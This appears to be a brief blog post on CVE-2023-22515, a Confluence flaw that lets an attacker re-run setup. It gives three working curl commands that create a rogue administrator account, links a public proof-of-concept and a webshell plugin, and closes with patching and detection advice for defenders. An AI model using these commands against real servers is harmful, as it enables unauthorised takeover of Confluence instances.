Late last year this vulnerability lead to the compromise of several on-premise installs of Atlassian Confluence. CVE-2023-22515 is scarily simple to exploit and is the result of certain requests sent to the server being trusted if they contained a certain header. With this it was then possible to re-run part of the initial setup to create an administrator account.
This repository shows that it can be exploited in the following way:
- Step 1 – Update the application to allow setup to run again:
curl http://<dest>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false - Step 2 – Create the admin user:
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=&fullName=&email=&password=&confirm=&setup-next-button=Next" http://<dest>/setup/setupadministrator.action - Step 3 – Complete setup:
curl -X POST -H "X-Atlassian-Token: no-check" http://<dest>/setup/finishsetup.action
As you can see from the above the header X-Atlassian-Token with the value no-check is the culprit.
I've made a quick video showing end to end exploitation with a webshell, this can be found below:
For bounty hunters and pentesters, this is as easy as it gets to find a critical bug. More likely to be found on internal tests since the initial find lead to a wave of compromise, but it's still out there.
For defenders – push your teams to update if you haven't already (affects versions 8.0.0 - 8.5.0). If you really can't update, ensure you have alerting against the following /server-info.action?bootstrapStatusProvider.applicationConfig, /setup/setupadministrator.action, and /setup/finishsetup.action. I created a lab around this vulnerability for Blue Team Labs Online called WikiLeaked which shows how this looks from the perspective of defenders.
The resources used in the above:
- Curl commands: https://github.com/j3seer/CVE-2023-22515-POC
- Webshell: https://github.com/dubfr33/atlassian-webshell-plugin